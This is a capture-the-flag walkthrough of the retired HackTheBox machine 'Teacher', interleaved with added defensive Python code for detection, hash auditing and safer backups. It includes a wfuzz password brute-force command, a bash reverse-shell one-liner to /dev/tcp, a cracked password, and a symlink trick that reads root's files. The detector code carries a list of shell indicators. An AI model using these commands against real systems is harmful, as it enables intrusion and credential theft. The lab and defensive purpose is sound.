Again, we start with nmap -sC -sV -Pn -oA ./Teacher 10.10.10.153
HTTP looks to be the only open port, running Apache 2.4.25. So, let's take a peek at the site itself. While manually looking around, we find a gallery page that looks to be missing an image.
If we look at the source of the page, we see that it is "/images/5.png". Curl that and we get the information below.
kali@kali:~$ curl http://10.10.10.153/images/5.png
I forgot the last charachter of my password. The only part I remembered is Th4C00lTheacha.
Could you guys figure out what the last charachter is, or just reset it?
While we were manually looking around, we also had gobuster running. It found a moodle directory and some other bits of fun.
So it looks like our friend Giovanni teaches Algebra. We know all but the last character. Let's build a quick list of possible combinations and then try them with wfuzz.
Run the list generator with
$python3 listcreator.py > passwords.txt
and then wfuzz it with
$wfuzz -w passwords.txt --hh 440 -t 20 -d "anchor=&username=giovanni&password=FUZZ" http://10.10.10.153/moodle/login/index.php
And with that we have Giovanni's creds: giovanni:Th4C00lTheacha#. So let's check around Moodle for common exploits. We find a big one at https://www.exploit-db.com/exploits/46551, and it looks like it applies: Moodle 3.4.1 - Remote Code Execution. They call it Evil Teacher. It allows you to create a Quiz inside of Moodle that will generate a low-level shell back to your attacking machine. For starters, go into the Algebra Course and turn editing on in the settings menu. Then you can "Add an activity or resource" and select Quiz.
You'll need to create a "Calculated" question. To do that, after creating the Quiz select Save and Display. From there, click the Settings gear again and scroll down to Questions.
Once you are inside the Question Bank, you can select Create New Question, and then Calculated. What you enter as the required information is really irrelevant until you get to the Answer 1 Formula field. For the formula add
into that field and Save and Continue Editing. It should ask you to Choose Wildcard dataset properties or some such, but that's irrelevant. We are where we need to be to add a URL-encoded string that should call back to our machine. Fire up Burp, capture the "returnurl" request and forward it to Repeater. Here, you should add your
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
to the end of the URL and instant reverse shell.
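From the defender's side, both of the steps above leave a clear trail in the Apache access log: the wfuzz run is a burst of POSTs to /moodle/login/index.php from one address, all with the same failed-login response size, and the "returnurl" step is a request whose URL-decoded query string contains a shell command. The script below is an added example, not part of the original writeup or of the Moodle project; it assumes Apache "combined" log lines, and the burst window and threshold, the login path and the indicator strings are my own choices. The log lines are constructed to mirror the two steps.

```python
# Added example (not from the original writeup): two detections over constructed
# Apache access-log lines. Detection 1 flags a burst of POSTs to the Moodle login
# page from one source IP (the password-guessing step). Detection 2 flags requests
# whose decoded URL carries reverse-shell indicators (the "returnurl" step).
import re
from collections import defaultdict
from datetime import datetime, timedelta
from urllib.parse import unquote_plus

# Apache "combined" format (assumed); the request line is split into method/path/proto.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)'
)

# Constructed sample: 25 login POSTs in 25 seconds from one IP (same 440-byte
# failure page), two ordinary GETs, and one request with a shell payload in a
# URL-encoded parameter. Addresses are made up for the example.
SAMPLE_LOG = []
for i in range(25):
    SAMPLE_LOG.append(
        f'10.10.14.7 - - [14/Dec/2018:10:00:{i:02d} +0000] '
        '"POST /moodle/login/index.php HTTP/1.1" 303 440'
    )
SAMPLE_LOG += [
    '10.10.14.9 - - [14/Dec/2018:10:01:00 +0000] "GET /moodle/ HTTP/1.1" 200 5120',
    '10.10.14.9 - - [14/Dec/2018:10:01:05 +0000] "GET /images/5.png HTTP/1.1" 200 117',
    '10.10.14.7 - - [14/Dec/2018:10:05:30 +0000] '
    '"GET /moodle/question/question.php?returnurl=%2Fmoodle%2Fquestion%2Fedit.php%3B'
    'bash+-i+%3E%26+%2Fdev%2Ftcp%2F10.10.14.7%2F8080+0%3E%261 HTTP/1.1" 200 3011',
]

def parse_line(line):
    """Parse one log line into a dict, or None if it does not match the format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return rec

def login_bursts(lines, path="/moodle/login/index.php", window=60, threshold=10):
    """Return {ip: total_posts} for IPs with more than `threshold` login POSTs
    inside any `window`-second span (sliding window over sorted timestamps)."""
    per_ip = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and rec["method"] == "POST" and rec["path"].split("?")[0] == path:
            per_ip[rec["ip"]].append(rec["ts"])
    flagged = {}
    for ip, times in per_ip.items():
        times.sort()
        start = 0
        for end in range(len(times)):
            while times[end] - times[start] > timedelta(seconds=window):
                start += 1
            if end - start + 1 > threshold:
                flagged[ip] = len(times)
                break
    return flagged

# Substrings that should never appear in a decoded Moodle query string (assumed list).
SHELL_INDICATORS = ("/dev/tcp/", "bash -i", "/bin/sh", "nc -e")

def shell_payloads(lines):
    """Return (ip, decoded_url) for requests whose decoded URL carries a shell indicator."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if not rec:
            continue
        decoded = unquote_plus(rec["path"])  # decode %XX and '+' before matching
        if any(ind in decoded for ind in SHELL_INDICATORS):
            hits.append((rec["ip"], decoded))
    return hits

if __name__ == "__main__":
    print("login bursts:", login_bursts(SAMPLE_LOG))
    for ip, url in shell_payloads(SAMPLE_LOG):
        print("shell indicator from", ip, "->", url)
```

Matching on the decoded URL matters: the payload is percent-encoded on the wire, so a signature written against the raw request line would miss it. Rate-based detection on the login page should key on the source address and on the constant failed-response size, which is exactly what wfuzz's --hh 440 filtered out on the attacker's side.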
Copy your LinEnum script into tmp and run it to see what's there. What you are looking for though, is actually in the config.php file of the Moodle CMS directory located at /var/www/html/moodle/config.php. In there, you will find MariaDB credentials.
If we run use moodle and then show tables, we will see mdl_user, which has a nice set of hashes for us to use. The only one we really care about is Giovanni's.
That is an MD5 hash that we can break down to "expelled". Side note: the other hashes are in the CTB file, as is the LinEnum output. Moving along, we can su to giovanni with the expelled password and grab the user flag. Onward to root!
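Two things made that step work: config.php was readable by a local user, and one row of mdl_user still held a raw MD5 instead of a bcrypt hash. The audit below is an added example, not part of the original writeup or of Moodle itself. It checks a table dump for non-bcrypt password hashes and checks a config.php mode for world-readability; the rows are constructed (the real hashes from the box are not reproduced) and the Moodle hash formats are stated from Moodle's own history (raw MD5 before 2.5, bcrypt since).

```python
# Added example (not from the original writeup): audit constructed mdl_user rows
# for legacy MD5 password hashes and a config.php mode for world-readability.
import hashlib
import re
import stat

LEGACY_MD5 = re.compile(r"^[0-9a-f]{32}$")          # 32 hex chars: raw MD5
BCRYPT = re.compile(r"^\$2[aby]\$\d{2}\$.{53}$")   # $2y$10$ + 22-char salt + 31-char hash

def classify_hash(h):
    """Moodle before 2.5 stored raw MD5 in mdl_user.password; current versions use bcrypt."""
    if LEGACY_MD5.match(h):
        return "legacy-md5"
    if BCRYPT.match(h):
        return "bcrypt"
    return "unknown"

def audit_users(rows):
    """Return usernames whose stored password is anything other than a bcrypt hash."""
    return [username for username, pw_hash in rows if classify_hash(pw_hash) != "bcrypt"]

def config_exposed(mode):
    """True if config.php's st_mode lets 'others' read it (any local user gets the DB password)."""
    return bool(mode & stat.S_IROTH)

# Constructed rows: one legacy MD5 of a made-up test password, one bcrypt-shaped hash.
SAMPLE_ROWS = [
    ("giovanni", hashlib.md5(b"constructed-test-password").hexdigest()),
    ("admin", "$2y$10$" + "A" * 53),
]

if __name__ == "__main__":
    print("users with weak hashes:", audit_users(SAMPLE_ROWS))
    print("config.php 0644 exposed:", config_exposed(0o644))
    print("config.php 0640 exposed:", config_exposed(0o640))
```

A legacy MD5 row is upgraded to bcrypt only when that user next logs in, so a dormant account can keep a crackable hash for years; the audit is worth running against the live table rather than assuming the upgrade finished. Moodle's own guidance is to keep config.php readable by the web server user only, which is what the 0640 check represents.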
Anti-climactic I know. Looking around again, we find a backup.sh script in the /usr/bin directory.
tar -czvf tmp/backup_courses.tar.gz courses/*;
tar -xf backup_courses.tar.gz;
chmod 777 * -R;
Since this is a retired box, and I am feeling VERY lazy today, let's just worry about the root flag and not a root shell. We can do this with symlinks. A simple link from root to a fake root folder will work.
giovanni@teacher:~$ cd work
giovanni@teacher:~/work$ cd tmp
giovanni@teacher:~/work/tmp$ ln -s /root fakeroot
giovanni@teacher:~/work/tmp/fakeroot$ cat root.txt
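The backup.sh above has two defects that the symlink trick relies on: it archives whatever the glob expands to, symlinks included, and it then runs chmod 777 recursively over the same names. The routine below is an added example, not the box's script and not the original writeup's code; it does the same job without either defect, refusing symlinks that resolve outside the tree being backed up and never touching permissions. The directory names (work/courses, fakeroot) follow the writeup, and the example builds its own tree in a temporary directory so it runs offline.

```python
# Added example (not from the original writeup): a backup routine that skips
# symbolic links and never loosens permissions, so a planted "fakeroot" link
# cannot pull /root into the archive or into a recursive chmod.
import os
import tarfile
import tempfile

def escaping_symlinks(root):
    """Return symlinks under `root` whose target resolves outside `root`."""
    root = os.path.realpath(root)
    found = []
    for dirpath, dirnames, filenames in os.walk(root):   # followlinks=False by default
        for name in dirnames + filenames:
            p = os.path.join(dirpath, name)
            if os.path.islink(p) and not os.path.realpath(p).startswith(root + os.sep):
                found.append(p)
    return found

def safe_backup(src, archive):
    """Archive regular files under `src`, dropping symlinks and hard links; return member names."""
    def skip_links(info):
        if info.issym() or info.islnk():
            return None          # returning None from the filter excludes the member
        return info
    with tarfile.open(archive, "w:gz") as tar:
        tar.add(src, arcname=os.path.basename(src), filter=skip_links)
    with tarfile.open(archive, "r:gz") as tar:
        return tar.getnames()

def demo():
    """Build work/courses with one course file and a symlink escaping the tree, then back it up."""
    base = tempfile.mkdtemp()
    courses = os.path.join(base, "courses")
    os.makedirs(courses)
    with open(os.path.join(courses, "algebra.txt"), "w") as f:
        f.write("course data\n")
    outside = tempfile.mkdtemp()            # stands in for /root
    with open(os.path.join(outside, "root.txt"), "w") as f:
        f.write("not for giovanni\n")
    os.symlink(outside, os.path.join(courses, "fakeroot"))
    links = escaping_symlinks(courses)      # what a pre-backup check would report
    members = safe_backup(courses, os.path.join(base, "backup_courses.tar.gz"))
    return links, members

if __name__ == "__main__":
    links, members = demo()
    print("escaping symlinks:", links)
    print("archived:", members)
```

The permission line has no safe equivalent and is simply dropped: a root-run script that does chmod 777 on user-controlled names will always be turned against whatever those names point at. If the job must run as root at all, running it from a directory the user cannot write to, or with tar's own --no-recursion and an explicit file list, removes the rest of the attack surface.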